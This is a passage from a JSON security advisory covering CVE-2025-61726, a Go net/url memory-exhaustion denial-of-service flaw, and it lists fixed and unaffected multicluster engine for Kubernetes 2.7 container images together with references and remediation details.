"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:86ed174f04e82706d3c5a793fc94c5f3ff78ef7a442056e9ffbfdf04543e47e8_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:a80ab7578c04779f5a91eb489efe6dfa821c2f22fad92f34864402604ae6d89a_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2434432"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the net/url package in the Go standard library. The package does not enforce a limit on the number of unique query parameters it parses. A Go application using the net/http.Request.ParseForm method will try to process all parameters provided in the request. A specially crafted HTTP request containing a massive number of query parameters will cause the application to consume an excessive amount of memory, eventually causing the application to crash or become unresponsive, resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: net/url: Memory exhaustion in query parameter parsing in net/url",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this flaw, an attacker must be able to send a specially crafted HTTP request to an application parsing URL-encoded forms with net/url, specifically a request containing a large number of unique query parameters. The request will cause the application to consume an excessive amount of memory and eventually result in a denial of service, with no impact to confidentiality or integrity. Due to this reason, this vulnerability has been rated with an important severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:76d00b37dc5c5d7bf489f55f3a41a953677449491b01c789bf7b29c789c461b7_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:a2fa219ec0da0910c1a858ac43d53288f2cf434c26fcb6cd8185e9d6f13a1ebd_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c4e710e3ab66dfbcb3f2db4d17f73aea44ea9d2649e5f5cec94c1b51644809cf_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c6a8bf6b7644c45a41d4c8a1c31cc08e03b6ac5ed36f562256cb1509f26a47c7_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:47c835ad25efcfa42534a1daf7235b18b318030546e81c784027c62ab665b896_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:50276a56714a1bc1aabedbadb7f702913412f6a20db8b110986436845ee2f3c7_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:705746f64a46c4990cc3ec16236c41c64352493fdeb9f7fbbc34353ff111e267_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:9358b7c24e4c4f8e72266af077352af1af3ba61e266087cf55b7dc9ea0eddcb9_ppc64le"
],
"known_not_affected": [
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:4667db4cc9699f5e41cda6388eb7371ad9c8c73a92a7fc19115ddd48b562e56e_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:c09c8b8f588cac2b8c4b15a79de635971f002419ffc2b4d967f383160897e2dd_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:d00a17c4162336d52d47452f13d2470ddd4f9d6913759472791ee4d8bfc34d46_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:fe8b267cb2ea707fda229bae30ca074079da2909e7313eff06ba9eb2fb529237_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:6ae1271bcaebb79d7dd48fa4bb89f2cf0bf450cce004899feee7d1a53d230a81_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:8ffc2f2cdfd7753c083ca083a42da60b8783d09b6817c6b22c38c91d67c0b4a5_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:9295aea24d0997fd5112e4bc6701f15e5ed2ee54f298d134aef5c9d499ad7ce5_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:fb103ee7a47badea6dfd32f698cc209bb2242dd90b51986cea6f26a03ade9516_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:8173d4f41f25103f387f1b148f9e90eba72abeccd506bfe657f6fd54cbbcf395_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e146412fb2f0d808cf6a0faa5f39e54032cd4b6c594d67795bb81883ebf0b386_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:ec486aa31c687d3f9e8dffe7ae5018b9ce3cc8795a91765c237eb72b2f6984c5_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:fb47b5a6d4fe1c966eb29109c27a5e323b6b4e665a2754f234979cef4bfc6fc2_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:111a02c966b528a619c9ad5942151e64374e0c57d80be21f91c0f41469c63c19_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:1396ea60940f7dfc33d67d918dd82d62f780d0e837e12785ccec2ada30ce3f93_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:4c393e89346494a9abd31c664e977edacd6ca8bf1f1c28c2aa9a6625f0d02d9f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ca4d807da014acefb7e963000cd2431352087dd908491ff4189592f53dec93ff_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:694ac8be10bee34d7c34fdcabde7dfdf1558053cac0479eca4677971c09589e6_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:c0b2cdac26577de087dfd119ff0e2f996f211cd9021bed43d01e286fe166642d_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:d35fb00e5d71a79ec679d7bb9911c4974ca4ebe334e76461270594feda1a7378_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:dabdf0f6fec7ebd5b86034281ae740aea0e77146e33bdd04c01590745b68ea8e_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:6e44a95fd942fad8a4f43379d100d2f11808caef975afbafe244543b2f33e2b1_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:bbcbedae29915aecb2d0722d16a5265b214714b2e8695f4885395982507950f8_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:f02386b7e2476ab45ef771bdc6034ba4148bdbbf30cb95e2110a681adaeaa03e_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:f87238bec802fb8e8aa257f73eb32f3b3cacf1564677e594ca0d165ed2c0a021_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:2dc8a21ac845a94b55a048554052666910cd7e5fc2f9731d62c8911f18ac3fcb_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:4cb50e9064955ace00ee9bbc0592f5e073affa7a29d0d8a119b67bb8fc9d5a20_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:674b94c6913ca04eb711ccf438f24fe22d7332c8f7ca733a8d0e6b5b5b3f99ab_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:dc747542c832d5868ce34b622f3cb73a3376beab272bdb156b4a5d29439173a8_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:04ac93d513d3d10d83de367893012f4098b281c89d773d5799393b1ecb184658_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:5b51bbe361be033ce654374dbf65f15a7449072207d8350959becd9921a7da1a_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:89d53a8fca9a27f188f13631f4416eb9c8460868e095ed207f55591c76ea0acf_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:e5ab3e9b45628c867d6b8babec0e2dc9b32d1b9bdf5aae9a74ac0e45b553355f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:1108dd8708d80e09fcc6cf4ecb2ec3d076f1fd22814b6c6ce2b4236143779527_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:4b8c28da26c5fcc04cfe2072965fdb957fd2ebc514afe8ab46c79d625dc7dd46_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:8cbfa37103a4fb66ce05ae0a001412af7556b61b4079406c82bb82a1c7bf841a_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:bf00fb14cf15607b90bfd5719b9707081b9f4696d4296944586fc839e0210d9b_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:2efa3dbf99e5be1f8eb4f169f5f2229b338fdf2d2c72b9c0b0da9392e612cc5f_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7141546552e4237c8b118044c3cc310ddfee917b547c36857a291c33e185bcc1_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:8aaa0f89e8e6ad810632240a7e032b6e673f69e1e4018ab6b36dd87de69ceeb8_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:d07f47405187ce8f4b91686b48d4ed71336ff2bd9218b88c31f52ddc22db9238_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:466a01f1457e47e5b418c8e1d87cc2d92e100d635e6cbbc6224039b71d413105_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:5d81a9b6f31e72d5beddec8128e693ecacd03bbbb6640a626e06a9b4b033c47e_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6d05352bd35932dc05bd12a06890b7e99594773791e0c8edd8492a835155acb3_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:70ad5cb3532bde1dd5a9337a7064dd8e1ff1799bcb017a2d2e6536a932ce22dc_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:0c554f87aa16a5c7a6c6ee78886787b055fad40c557f1cbaa5996db9a09b41ce_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:618edff2bf45eea71e6f3e7f7b24e95f10314b146ff45ac72ea8cabb1cb373d4_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:92d36152258c9d926be0bdcfac34995f22eec3518111fbf2c768b660129f5440_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:cacde4ea2c1d98290f68b7ad0a3ca31582710a3b64442649baace5b8ee953f89_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:365a26e2d054aefe147ad411da6014e76c9d4f4646a8382b9be3f3eeb35fc6cf_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:775d0fbe7f2a3d4abdbb751331dbdc7457ff489e1d2aa32c93b7bec4dff2eeb4_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d0062eaae78adb437020762d1a3e555c2b5bc0fe05da89716b2e8acf673ff661_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:db93b4a928c940e66ea4ada9f69f3b20f6bf4d64146df89d8e9e5a66acd2a03c_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:0b57da9ddb495d659da29e2a699d5fedb720056f72f77e426c40c1a7bae79a87_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:52625c24cfe3921bc6c00090b150b36544410b9b877b43e148abf634cdb8c0e9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:91c20f61a7e054ac5b53b8b8ad06f110ed3db0ace9258fd9e2b3fa03f59f11ab_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:e91c55697e0d95b8c9265d0072c5b80faed4dd9dfdfeb87443f98f473fcf42bc_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:06109d274a92145cc11d4f30ed877d2a233a4852e3537d87b117e6682b911b20_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:4f7e7a8764b018c6d51c0700a76f0dcedcf5ffe85f28f66c214e36455105e32f_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:d6afe401727d8b252009042c03319fb6a9bc2cfd2ffba5e5518c9a22e91692de_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:dc366eaa2c3f3f72003f928262c03900983aaac8352615715d72bf5223b59a94_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:2a1963aa5fb3ee452084510bac3792ae508b5c9eeb41c676e13f2551d7c88d60_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:9774a696206b422b52b5f1082750d7e62cccf3c7ee0e28ec156b560cf1acebb0_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:99d0b694cee080c924c2e2294af4a0a36f669129516f205b5e13a3eabd1ee019_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:a99ef9cd8f37bbf76d5bb6b81865547af9ec456b0204e36995ff86960abcf1f5_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:1b2c836336117c0e04dc30101898117b68edf6489ad9da955453cb6e4491bb33_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:259049072cf889d7b72fdae5b5a17bd2d4d6fd176cb1da4274b70f02c854dea9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:90a96bb156d096a0c55fcf27b2dc0176e56c9b7388697ed17d9bbb257c39a3aa_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f3aa3d1b579275dcdf403867cc9b140f34cfcdc099d4b87819ef7f4978af2be1_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:21b52ad7c77dd21bc0a9a20a1ae6e2fc5d236b39e16dbfa82158ec80ef2846d4_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:6a83c52ba828f45e84550ba702ba86d5746057194d389b6959ab7486e8615b16_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:b22d17d474876f6079c86518dbc04e692ade54067cd4fc0c5660d8a1ba0937cf_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:b34be4d5652efaee930bd26536547fd1fc04dda4060605dabc276e59f96a0a0c_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:6ab181004adafad8a5cd0155da9e107ab3989ef97007e69decb7238a9b0597da_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:7782c711aff60d9ac0d8297431eabca6945752292b16beecdb52303ad22f1553_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:9a23dfe4c781261e8db8fbb65517d69c3532fba5e897978b8a7765864b84b495_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:c29b2dc7510dcc147cf8460e4e39c0f2595edc4ff81f62c035333c6354776335_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:08592505c61791b614511a2c51d9963aa3277ac9e2af98954b07e47e36ca6765_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:1145c4b8c3606c2550986f1bf352835300f58d81f6c50d63846983a666602655_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:53c5fd16cd44f631ca08f6eb51e346d99950c9b4c6860743262c068074ba3c9f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:aed4dab31c6e0d932781c631022214fdea5b28e6ccdc00abee3e006d13befe8a_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:31acda49be5c46912447113bf6133b4457f1f49270741859cb1493b65474d203_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:66c468c37631e94fcc32442e93a149caf3ad4831d1817314983dde8ba145fd25_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:d24798fdb05f2c2959b03889dff46e58c3b15d531a3750d1cd153ae4fcfda087_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:fce0a7344e9f0d86a8d5e5dbd70a3a8ef6a55567ade0a7345ffda3344d2617d6_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:04cc5c05db5bd9bd83f529523cc003c0ebe72d1ab55b2617bee8375b5f11616e_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4ed9ab5ffc8c4fb0dc4c9faaa13e63c81dd40e2e04784bd7f48e81a0bd734a14_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:92230ad9427b8002fca17de62427089eaa409edcaa39554a96cf16c23b41b1bd_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:e8e78077943e22dfbf24b01d40f866954e39e783711a3ceab6c6f08e8e07fdce_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:5a1f7f5125b9fff4c8b415e93eaad7257af8ffb3b70823917cf0eec075484b8b_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:a47433ffe10df556b6bea4c0cc3c3f3ac508e1a9d6ab81981f7ab84afc34524c_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:ae032d3383977818eab9f396217d9de8053e6a0fe2657a21fec9b4bae58940ed_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:d2e664349d706e81882258dae2d18de73c65d09649e7ac74f5616ecb81f2ffbe_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2a8862c66d7bba87f0ab708d1644eb7c01840fc8f5b3b7373044aff4e219e000_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2d091748418b3f6d3cdcc4b4d773c98c8a22cac2717ed5274a6d8c612af51f71_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:3589f0bf450892dbfe4bac6c5255ebec5109e1d5d2e102dfb8e3e5894427a9b5_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:4dfb3a2b2ea2a32c5cfc770c84fba0f158d2c759d3a6559b01efd365e4a19e52_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:2bc2bb010570cb1f65205b4c6f7f470e8b2242d1401f4d0ab8ba08bdabacefeb_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:495dece80910102a98e78394ca35ee5c4703d32f705f43f9813312872dd8b528_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:86ed174f04e82706d3c5a793fc94c5f3ff78ef7a442056e9ffbfdf04543e47e8_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:a80ab7578c04779f5a91eb489efe6dfa821c2f22fad92f34864402604ae6d89a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-61726"
},
{
"category": "external",
"summary": "RHBZ#2434432",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2434432"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-61726",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61726"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-61726",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61726"
},
{
"category": "external",
"summary": "https://go.dev/cl/736712",
"url": "https://go.dev/cl/736712"
},
{
"category": "external",
"summary": "https://go.dev/issue/77101",
"url": "https://go.dev/issue/77101"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc",
"url": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4341",
"url": "https://pkg.go.dev/vuln/GO-2026-4341"
}
],
"release_date": "2026-01-28T19:30:31.215000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-24T14:23:47+00:00",
"details": "For multicluster engine for Kubernetes, see the following documentation for\ndetails on how to install the images:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.12/html/clusters/cluster_mce_overview#mce-install-intro",
"product_ids": [
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:76d00b37dc5c5d7bf489f55f3a41a953677449491b01c789bf7b29c789c461b7_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:a2fa219ec0da0910c1a858ac43d53288f2cf434c26fcb6cd8185e9d6f13a1ebd_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c4e710e3ab66dfbcb3f2db4d17f73aea44ea9d2649e5f5cec94c1b51644809cf_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c6a8bf6b7644c45a41d4c8a1c31cc08e03b6ac5ed36f562256cb1509f26a47c7_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:47c835ad25efcfa42534a1daf7235b18b318030546e81c784027c62ab665b896_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:50276a56714a1bc1aabedbadb7f702913412f6a20db8b110986436845ee2f3c7_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:705746f64a46c4990cc3ec16236c41c64352493fdeb9f7fbbc34353ff111e267_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:9358b7c24e4c4f8e72266af077352af1af3ba61e266087cf55b7dc9ea0eddcb9_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5636"
},
{
"category": "workaround",
"details": "Red Hat has investigated whether a possible mitigation exists for this issue, and has not been able to identify a practical example. Please update the affected package as soon as possible.",
"product_ids": [
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:4667db4cc9699f5e41cda6388eb7371ad9c8c73a92a7fc19115ddd48b562e56e_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:c09c8b8f588cac2b8c4b15a79de635971f002419ffc2b4d967f383160897e2dd_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:d00a17c4162336d52d47452f13d2470ddd4f9d6913759472791ee4d8bfc34d46_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:fe8b267cb2ea707fda229bae30ca074079da2909e7313eff06ba9eb2fb529237_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:76d00b37dc5c5d7bf489f55f3a41a953677449491b01c789bf7b29c789c461b7_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:a2fa219ec0da0910c1a858ac43d53288f2cf434c26fcb6cd8185e9d6f13a1ebd_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c4e710e3ab66dfbcb3f2db4d17f73aea44ea9d2649e5f5cec94c1b51644809cf_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c6a8bf6b7644c45a41d4c8a1c31cc08e03b6ac5ed36f562256cb1509f26a47c7_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:6ae1271bcaebb79d7dd48fa4bb89f2cf0bf450cce004899feee7d1a53d230a81_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:8ffc2f2cdfd7753c083ca083a42da60b8783d09b6817c6b22c38c91d67c0b4a5_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:9295aea24d0997fd5112e4bc6701f15e5ed2ee54f298d134aef5c9d499ad7ce5_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:fb103ee7a47badea6dfd32f698cc209bb2242dd90b51986cea6f26a03ade9516_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:8173d4f41f25103f387f1b148f9e90eba72abeccd506bfe657f6fd54cbbcf395_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e146412fb2f0d808cf6a0faa5f39e54032cd4b6c594d67795bb81883ebf0b386_s390x",
